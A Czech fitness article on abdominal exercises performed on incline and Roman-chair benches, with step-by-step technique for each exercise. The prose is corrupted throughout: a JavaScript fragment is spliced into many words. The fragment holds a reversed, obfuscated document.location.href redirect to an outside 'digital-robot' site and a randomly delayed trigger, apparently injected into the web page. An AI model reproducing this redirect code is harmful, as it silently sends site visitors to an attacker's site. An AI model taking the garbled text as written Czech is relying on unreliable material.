Tréninky

PERFEKTNÍ BŘICHO

NEPŘEHLÍŽEJTE CVIKY NA LAVIČKÁCH

V kulturistice narazíte na řadu teorií. Některé mají svoji váhu, jiné nikoliv. Postupem času každý zjistí, co na něj funguje a co naopak v jeho případě smysl zcela postrádá. Byla by protobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to škoda některé cviky předem zavrhovat. Což se bohužel stalo některým cvikům na břicho.

Už je tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to pěkných pár let, co zkracovačky vytlačily z piedestalu dříve tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tolik oblíbené sedy a lehy. Spolu s nimi ale ustobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toupila do ústraní i šikmá a hyperextenzní lavička. Přitobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tom byly časy, kdy kulturisté strávili posilováním břicha na lavičkách poměrně hodně času. A přinášelo jim tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to skvělé výsledky. Na tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to bychom rozhodně neměli zapomínat. A možná vašemu zájmu trochu napomůže, když prozradíme, že tytobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to cviky nechyběly ani v tréninkovém programu Arnolda Schwarzeneggera.

SEDY A LEHY NA ŠIKMÉ LAVIČCE

Cvik se provádí z pozice, kdy chodidla zaklesnete za polstrované válečky, položíte se hlavou dolů zády na lavičku (úhel sklonu by měl být zhruba 45°) a pokrčené ruce držíte za hlavou.

Z tétobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to polohy se silou břišních svalů zvedejte do fáze, kdy trup a stehna svírají pravý úhel. Poté se pomalu, kontrolovaně pokládejte zpět.

 

Náročnější variantobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tou pak jsou…

 

SEDY A LEHY S KLADKOU NA ŠIKMÉ LAVIČCE

Jde pravděpodobně o jeden z nejefektivnějších a současně málo zařazovaných cviků na břicho. Kladka vám umožní zatížit břišní svaly skutečně prvotřídně.

Zaujměte výchozí polohu na nakloněné lavici hlavou dolů, úhel sklonu je stejný jako u předchozí varianty. Lavičku umístěte tak, abyste měli spodní kladku za hlavou. Chodidla zaklesněte za opěrky, natáhněte ruce dozadu a uchopte zakončení s lanem. Konce lana přitáhněte k ramenům. Paže jsou nyní v takové pozici, abyste drželi dlaně u uší a v tétobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to pozici zůstávají po celou dobu cvičení. Zatněte břišní svaly a zvedejte do sedu, pokud možno co nejvýš, aby se lokty dotkly kolen. V horní fázi zatínejte břicho a dbejte na silnou kontrakci svalů. Potobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tom se pomalu pokládejte zpět. Snažte se, aby síla nevycházela ze stehenních svalů, tím byste aktivovali flexory boků. Pohyb zpět provádějte kontrolovaně. Mezi opakováními v jedné sérii byste se svaly břicha neměly vůbec uvolnit.

 

TIP PRO VÁS: na šikmé břišní svaly se můžete zaměřit, pokud budete v horní fázi vytáčet levý loket k pravému kolenu a naopak. Strany střídejte.

 

Kdo vyhledává výzvy a chce otestobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovat sílu svých břišáků, může vyzkoušet

SEDY A LEHY NA HYPEREXTENZNÍ (ŘÍMSKÉ) LAVIČCE

Ano, tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to „nejlepší“ jsme si nechali na konec. Sedy a lehy na římské lavičce jsou cvikem pro pokročilé a měli by je protobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to provádět ti, kteří již mají solidní základy a netrpí problémy s dolní partií zad. Náročnost cviku vychází zejména z faktu, že zcela chybí opora zad ve výchozí fázi pohybu. Břicho, potažmo celý trup musí být tedy nestále v tenzi, přičemž v horní fázi pohybu dochází k silné kontrakci aktivovaných svalů.

Sedněte si na římskou lavičku, zaklesněte chodidla za opěrky. Ruce držte u hlavy nebo zkřížené na hrudníku. Začínejte ve vzpřímeném sedu. Pak pomalu pokládejte trup dozadu tak, aby byl v dolní fázi kousek nad rovnoběžnou linií se zemí. Silně zatínejte břišní svaly. Máte možnost v horní fázi aktivovat zejména dolní partii břišních svalů. Dokonce se mnozí sportobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovci shodují, že ta aktivace je výraznější než při zdvizích nohou ve visu.

Pokud budete schopni provést dvě série sedů a lehů na římské lavici, můžete se považovat za přeborníky tréninku břišních svalů.